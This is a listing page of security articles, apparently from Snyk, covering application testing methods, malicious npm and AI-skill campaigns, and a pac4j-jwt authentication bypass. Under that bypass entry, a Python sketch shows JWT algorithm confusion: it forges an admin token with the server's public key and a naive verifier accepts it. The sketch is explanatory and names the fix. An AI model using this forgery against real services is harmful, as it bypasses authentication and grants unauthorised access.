
Resources

White paper

From First Prompt to Final Fix: How Snyk Secures AI-Driven Development

Read now

Report

Unifying Control for Agentic AI With Evo by Snyk

Read now

Article

From SKILL.md to Shell Access in Three Lines of Markdown: Threat Modeling Agent Skills

Read now

Showing 1 - 24 of 362 resources

Article

Inside StegaBin: How a DPRK Steganography Campaign Generated Headlines

North Korean hackers published 26 malicious npm packages using Pastebin steganography for C2. It made headlines everywhere. We checked the data: zero real-world impact. Here's what the campaign actually did, and what it tells us about the real risk of malicious package campaigns.

Article

CVE-2026-29000: How a Public Key Breaks Authentication in pac4j-jwt

CVE-2026-29000 is a CVSS 10.0 authentication bypass in pac4j-jwt that lets attackers forge admin tokens using only the server's RSA public key. Learn how the vulnerability works, whether you're affected, and how to fix it.
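The forgery described above matches the well-known JWT algorithm-confusion class (RS256 downgraded to HS256): if a verifier trusts the token's declared algorithm and feeds its RSA public key into an HMAC check, anyone holding that public key can sign valid-looking tokens. The sketch below illustrates that general pattern with stdlib primitives only; it is not pac4j-jwt code, and the key material and function names are hypothetical.

```python
# Illustrative sketch of RS256 -> HS256 algorithm confusion.
# Hypothetical names throughout; not taken from pac4j-jwt.
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# The attacker only needs the server's *public* key material.
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\n...\n-----END PUBLIC KEY-----\n"

def forge_token(payload: dict, public_key: bytes) -> str:
    """Attacker side: sign an HS256 token using the public key as the HMAC secret."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    sig = hmac.new(public_key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"

def naive_verify(token: str, key: bytes) -> bool:
    """Vulnerable pattern: trusts the token's alg header and reuses the same
    key bytes for HMAC that it would use for RSA verification."""
    header, body, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(b64url(expected), sig)

token = forge_token({"sub": "admin"}, PUBLIC_KEY_PEM)
print(naive_verify(token, PUBLIC_KEY_PEM))  # the forged admin token is accepted
```

The fix for this class of bug is to pin the expected algorithm on the verifier side and never derive an HMAC secret from asymmetric key material.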

Article

Accelerating Public Sector Modernization with Secure AI-Driven Migration

Learn how generative AI accelerates legacy application migration for the public sector—and how Snyk secures AI-generated code, dependencies, containers, and cloud infrastructure from code to cloud.

Article

DAST vs. Penetration Testing: 5 Key Differences

Deciding between DAST and penetration testing is vital for securing modern APIs and microservices. Learn how to combine these methodologies to build a robust, layered security strategy that protects your entire application portfolio.

Article

Top 8 Claude Skills for UI/UX Engineers

Explore the top Claude Skills transforming UI/UX engineering by automating repetitive tasks like accessibility audits and component scaffolding. Discover how to streamline your workflow and focus on the creative decisions that truly matter.

Article

Top 8 Claude Skills for Developers

From Manus-style task planning to Terraform code generation and Core Web Vitals optimization, these 8 Claude Skills give developers repeatable AI-powered workflows for real engineering work.

Article

Six Principles for Rethinking DevSecOps for AI

The six principles are Developer-First AI Security, Secure AI by Design, Shared AI Accountability, Automated AI Security, AI-Specific Intelligence, and AI Governance & Continuous Improvement.

Article

Your AI "Skills" Are the New Agentic Attack Surface

As AI moves beyond simple chat to autonomous execution, the skills powering these agents have emerged as a dangerous new attack surface. Learn how to protect your organization from malicious AI agent tools while maintaining development velocity in the age of agentic workflows.

Article

Anthropic Just Launched Claude Code Security. Here's Why That's Great News for the Industry

Anthropic's launch of Claude Code Security is sparking headlines about the end of traditional security, but the real story is about the shift from detection to automated remediation. This move validates a layered security approach that combines AI reasoning with deterministic analysis to protect the modern software supply chain.

Article

Building Safer AI Agents with Structured Outputs

Learn how structured outputs help developers build safer, more reliable AI agents by enforcing strict schemas during token generation. Discover the essential frameworks and security tools needed to move your AI agents to an enforcement-based production environment.

Article

SAST vs. DAST vs. IAST vs. RASP: Understanding Application Security Testing Methods

Navigate the key differences between SAST, DAST, IAST, and RASP. This guide explains how to integrate these testing methods throughout the software development lifecycle to eliminate blind spots and block real-time attacks.

Article

BOLA: The API Vulnerability Hiding in Plain Sight

Discover why Broken Object Level Authorization (BOLA) is the #1 OWASP API risk. Learn why traditional testing tools fail to detect this "hidden" flaw and how Snyk’s AI-powered DAST provides the context needed to stop data breaches.

Article

How AI Agents Still Break Security When Nothing Is Broken

AI agents can fail security without any bugs or vulnerabilities. Learn why agent behavior breaks trust boundaries and how threat modeling mitigates risk.

Article

4 Reasons Why Dynamic Security Testing Is Critical For All Your Assets

Attackers don't just target your crown jewels; they look for the weakest link in your entire application footprint. Limiting dynamic security testing to tier-one apps leaves dangerous blind spots across forgotten APIs and internal tools. Discover why universal DAST is critical for modern risk management and how it helps teams uncover hidden vulnerabilities before they become entry points for a breach.

Article

Inside the 'clawdhub' Malicious Campaign: AI Agent Skills Drop Reverse Shells on OpenClaw Marketplace

Snyk security researchers have uncovered the clawdhub malicious campaign targeting the ClawHub AI marketplace with Trojanized skills that drop reverse shells. This sophisticated attack uses social engineering and obfuscated scripts to compromise hosts via AI agent capabilities on Windows and macOS. Learn how to identify these threats and secure your AI supply chain against evolving agentic workflow risks.

Article

From SKILL.md to Shell Access in Three Lines of Markdown: Threat Modeling Agent Skills

Discover the lethal trifecta of AI agent security risks. Learn how malicious OpenClaw Skills and supply chain attacks like ClawHavoc put your data at risk. Threat model your AI agents and secure them with Snyk Evo.

Article

Your Clawdbot (OpenClaw) AI Assistant Has Shell Access and Is One Prompt Injection Away from Disaster

Is your personal AI assistant secure? Dive into the agentic security risks of Clawdbot: prompt injection, supply chain, and network exposure. Discover Snyk's tools to secure your agents.

Article

DAST vs RASP: Understanding the Differences in Application Security

Understand the critical differences between DAST and RASP to build a robust application security strategy. This guide explores how DAST proactively identifies vulnerabilities before deployment while RASP provides real-time protection during runtime. Learn how to leverage both technologies to create a layered defense for your modern software stack.

Article

5 Benefits of Using SAST and DAST Together

Discover why combining SAST and DAST is essential for comprehensive application security, from early code analysis to runtime validation. By integrating both methodologies, teams can reduce false positives, lower remediation costs, and automate security within CI/CD pipelines. Learn how to bridge the gap between development and security to build faster and more securely.

Article

Building Secure MCP Servers: A Developer's Guide to Avoiding Critical Vulnerabilities

Article

Cloud Network Security: Best Practices & Essential Strategies for Protecting Modern Cloud Infrastructure

Modern cloud security requires moving beyond traditional perimeters to embrace Zero Trust, AI-driven threat detection, and quantum-safe encryption. This guide outlines essential strategies for mitigating misconfigurations and managing the shared responsibility model. Learn how to automate your incident response to stay ahead of evolving DDoS and AI-weaponized attacks.

Article

CSPM vs SSPM: Understanding the Differences and When You Need Both

Understand the critical differences between CSPM and SSPM and why modern enterprises need both to secure their cloud infrastructure and SaaS applications. While CSPM focuses on IaaS and PaaS security, SSPM targets risks within SaaS platforms like Microsoft 365 and Salesforce.

Article

Debunking the Top 5 Myths About DAST

Modern Dynamic Application Security Testing (DAST) has evolved far beyond its outdated reputation for being slow or noisy. This guide debunks five common myths, demonstrating how AI-driven DAST provides fast, automated runtime security that catches critical vulnerabilities static analysis often misses.

Article

From SBOM to AI-BOM: Rethinking Visibility in AI-Native Systems

AI supply chains move too fast for SBOMs. Learn why AI-BOM is becoming the foundation for AI security and governance.